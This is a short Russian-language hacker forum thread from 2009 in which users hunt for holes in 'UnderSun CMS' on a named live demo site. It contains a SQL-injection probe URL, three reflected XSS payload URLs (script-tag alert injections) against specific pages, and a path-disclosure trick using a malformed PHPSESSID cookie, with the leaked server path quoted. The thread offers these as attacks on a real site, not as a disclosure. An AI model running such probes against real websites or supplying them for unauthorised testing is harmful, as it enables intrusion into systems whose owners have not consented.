Кто что знает про эту CMS ?

moinick · 1 Jul 2009

Нужны любые баги, уязвимости..
demo.undersky.ru
demo.undersky.ru/admin/
http://demo.undersky.ru/rss.php?mode=1'&doc=5
Кто еще что подкинет?
Это просто пример, на этом движке
UnderSun CMS называется..

Ctacok · 7 Jul 2009

moinick said:

Нужны любые баги, уязвимости..
demo.undersky.ru
demo.undersky.ru/admin/
http://demo.undersky.ru/rss.php?mode=1'&doc=5
Кто еще что подкинет?
Это просто пример, на этом движке
UnderSun CMS называется..
Click to expand...

И так в GET запросе Mode
Ты поставил ', SQL иньекция это не ошибка, это выполнение произвольных команд. Запомни.

http://demo.undersky.ru/sites.html?p=2%22%3E%3Cscript%3Ealert();%3C/script%3E
Click to expand...

http://demo.undersky.ru/forget_passw.html?answ=14%22%3E%3Cscript%3Ealert();%3C/script%3E
Click to expand...

http://demo.undersky.ru/news.html?id=3%22%3E%3Cscript%3Ealert();%3C/script%3E
Click to expand...

Кароч там всё с XSS
Раскрытие путей
В куках

PHPSESSID=@#$%^&*
Click to expand...

Итог

Warning: session_start() [function.session-start]: The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /usr/home/undersun/domains/demo.undersky.ru/public_html/index.php on line 7
Click to expand...

Кароч сайтег дырявенький

Кто что знает про эту CMS ?

moinick New Member

Ctacok Banned

Useful Searches

Кто что знает про эту CMS ?

moinick New Member

Ctacok Banned